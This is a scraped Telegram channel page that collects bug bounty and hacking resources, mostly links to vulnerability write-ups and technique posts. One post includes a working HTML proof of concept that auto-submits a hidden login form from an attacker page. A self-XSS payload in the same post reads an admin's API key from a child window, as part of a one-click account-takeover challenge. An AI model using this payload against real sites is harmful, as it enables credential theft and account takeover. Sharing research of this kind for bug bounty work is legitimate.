BugBounty & Hacking Resources – Telegram
BugBounty & Hacking Resources
@projectzeroTM
1.18K subscribers
22 photos
2 videos
5 files
362 links
Download Telegram
About
Blog
Apps
Platform
Join
BugBounty & Hacking Resources
1.18K subscribers
BugBounty & Hacking Resources
https://labs.watchtowr.com/the-best-security-is-when-we-all-agree-to-keep-everything-secret-except-the-secrets-nakivo-backup-replication-cve-2024-48248/
watchTowr Labs
The Best Security Is When We All Agree To Keep Everything Secret (Except The Secrets) - NAKIVO Backup & Replication (CVE-2024-48248)
As an industry, we believe that we’ve come to a common consensus after 25 years of circular debates - disclosure is terrible, information is actually dangerous, it’s best that it’s not shared, and the only way to really to ensure that no one ever uses information…
1
423 viewsbot
BugBounty & Hacking Resources
https://research.checkpoint.com/2025/modern-approach-to-attributing-hacktivist-groups/
Check Point Research
Modern Approach to Attributing Hacktivist Groups - Check Point Research
Research by: Itay Cohen (@megabeets_) Over the past few decades, hacktivism has been, in a lot of cases, characterized by minor website defacements and distributed denial-of-service (DDoS) attacks, which, while making headlines, had minimal lasting impact.…
1
462 viewsbot
BugBounty & Hacking Resources
https://www.synacktiv.com/en/publications/taking-the-relaying-capabilities-of-multicast-poisoning-to-the-next-level-tricking
Synacktiv
Taking the relaying capabilities of multicast poisoning to the next
1
561 viewsbot
BugBounty & Hacking Resources
https://jub0bs.com/posts/2025-02-28-cost-of-panic-recover/
Jub0Bs
The cost of Go's panic and recover
TL;DR ¶ Some of the wisdom contained in Josh Bloch’s Effective Java book is relevant to Go. panic and recover are best reserved for exceptional circumstances. Reliance on panic and recover can noticeably slow down execution, incurs heap allocations, and precludes…
1🔥1
594 viewsbot
BugBounty & Hacking Resources
https://blog.doyensec.com/2025/03/04/exploitable-sshd.html
Doyensec
!exploitable Episode Two - Enter the Matrix
In case you are just tuning in, Doyensec has found themselves on a cruse ship touring the Mediterranean. Unwinding, hanging out with colleagues and having some fun. Part 1 covered our journey into IoT ARM exploitation, while our next blog post, coming in…
🔥2
541 viewsbot
BugBounty & Hacking Resources
https://www.thezdi.com/blog/2025/3/3/cve-2024-43639
Zero Day Initiative
Zero Day Initiative — CVE-2024-43639: Remote Code Execution in Microsoft Windows KDC Proxy
In this excerpt of a Trend Micro Vulnerability Research Service vulnerability report, Simon Humbert and Guy Lederfein of the Trend Micro Research Team detail a recently patched code execution vulnerability in the Microsoft Windows Key Distribution Center…
🔥2
557 viewsbot
BugBounty & Hacking Resources
https://github.com/google/security-research/security/advisories/GHSA-j8p5-79jf-g575
GitHub
PostgreSQL: Privilege Escalation Vulnerability via pg_cron
### Summary
A logical flaw in the pg_cron extension allows low-privileged users with ownership over pg_cron's job table or ability to change the value of cron.database_name to run arbitrary SQ...
🔥2
707 viewsbot
BugBounty & Hacking Resources
https://talosintelligence.com/vulnerability_reports/TALOS-2024-2063
1
726 viewsbot
BugBounty & Hacking Resources
https://blog.doyensec.com/2025/02/27/exploitable-sshd.html
Doyensec
!exploitable Episode Two - Enter the Matrix
In case you are just tuning in, Doyensec has found themselves on a cruse ship touring the Mediterranean. Unwinding, hanging out with colleagues and having some fun. Part 1 covered our journey into IoT ARM exploitation, while our next blog post, coming in…
1🔥1
777 viewsbot
BugBounty & Hacking Resources
https://itm4n.github.io/reinventing-powershell/
itm4n’s blog
Reinventing PowerShell in C/C++
I like PowerShell, I like it a lot! I like its versatility, its ease of use, its integration with the Windows operating system, but it also has a few features, such as AMSI, CLM, and other logging capabilities, that slow it down. You know, I’m thinking about…
🔥21
776 viewsbot
BugBounty & Hacking Resources
https://medium.com/@renwa/client-side-path-traversal-cspt-bug-bounty-reports-and-techniques-8ee6cd2e7ca1
Medium
Client Side Path Traversal (CSPT) Bug Bounty Reports and Techniques
Over the past year, CSPT bugs have gained significant attention, with numerous blogs and disclosed reports highlighting their impact…
1
835 viewsᴍͥᴏᴇͣɪͫɴ
BugBounty & Hacking Resources
https://blog.doyensec.com/2024/07/02/cspt2csrf.html
Doyensec
Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF
To provide users with a safer browsing experience, the IETF proposal named “Incrementally Better Cookies” set in motion a few important changes to address Cross-Site Request Forgery (CSRF) and other client-side issues. Soon after, Chrome and other major browsers…
1
1.02K viewsᴍͥᴏᴇͣɪͫɴ
BugBounty & Hacking Resources
https://www.landh.tech/blog/20250327-we-hacked-gemini-source-code/
5
851 viewsγαsιη
BugBounty & Hacking Resources
https://www.utsa.edu/today/2025/04/story/utsa-researchers-investigate-AI-threats.html
4
686 viewsyasin
BugBounty & Hacking Resources
https://ghintel.secrets.ninja
🔥2👍1
606 viewsSepehr
BugBounty & Hacking Resources
HTML_POC_ON_ATTACKER_WEBSITE:


<!DOCTYPE html>
<html>
<head>
  <noscript>attacker website</noscript>
</head>
<body>
  <button onclick="run()">click</button>

  <form id="myForm" method="POST" action="http://site.com/index.php" style="display:none;">
    <input type="hidden" name="username" value="user">
    <input type="hidden" name="password" value="pass">
    <input type="hidden" name="login" value="">
  </form>

  <noscript>
    function run() {
      window.zwin = window.open("http://site.com/index.php", "childWindow", "width=600,height=400");
      setTimeout(() => {
        document.getElementById("myForm").submit();
      }, 3000);
    }
  </noscript>
</body>
</html>






self-xss in name:


<noscript>zwins = window.open('', 'childWindow'); key = zwins.document.querySelector('.api-key p').textContent; alert(key);</noscript>




https://x.com/yshahinzadeh/status/1911847626472825233?s=61
X (formerly Twitter)
YS (@YShahinzadeh) on X
[white box challenge]
Can you convert the Self-XSS into a 1-click ATO? this challenge is based on a real world bug, a semi-novel way to exploit Self-XSS. challenge objective is to steal admin's API key, give it a shot:

https://t.co/USYCPgX7kr

online instance:…
👏8👍2
788 viewsedited  
BugBounty & Hacking Resources
https://coopergyoung.com/exacerbating-cross-site-noscripting-the-iframe-sandwich/
Cooper Young
Exacerbating Cross-Site Scripting: The Iframe Sandwich - Cooper Young
I’m starting this post with adoration for the Critical Thinking Podcast. The podcast launched around the time I began hacking full-time, and I consider it my companion. It is required listening for bug bounty hunters, but I recommend it to anyone involved…
4
678 viewsAbolFazl
BugBounty & Hacking Resources
https://x.com/moeinerfanian/status/1912599404558839825
X (formerly Twitter)
MOEIN (@moeinerfanian) on X
🚨 Just dropped Eye Of Ra on GitHub!
Track bug bounty programs across HackerOne, Bugcrowd(WIP), Intigriti(WIP) & YesWeHack(WIP) with live updates + Discord alerts 📡💥

Open source & ready to hunt
🔗 https://t.co/gtGFdZBzOt

#bugbounty #infosec #hackerone #bugcrowd…
71
674 viewsᴍͥᴏᴇͣɪͫɴ
BugBounty & Hacking Resources
https://x.com/thelilnix/status/1912558357635801536
X (formerly Twitter)
LIL NIX (@thelilnix) on X
When you use "Tagged Templates" (e.g, alert`123`), JavaScript passes something like this to the function:
alert(["123"])
NOTE: Since alert uses "toString" on the given parameter, it becomes ["123"].toString() and then "123".
1
701 viewsᴍͥᴏᴇͣɪͫɴ
BugBounty & Hacking Resources
https://medium.com/@AlQa3Qa3_M0X0101/how-i-was-able-to-get-account-takeover-via-idor-form-jwt-caaf7ea58aa
Medium
How I was able to get account takeover via IDOR form JWT
Hello guys, today I’m gonna explain how I got IDOR and exploit it to make account takeover.
1
712 viewsᴍͥᴏᴇͣɪͫɴ
BugBounty & Hacking Resources
https://x.com/neotrony/status/1914724953989259381?s=46
🔥133
676 viewsMeydi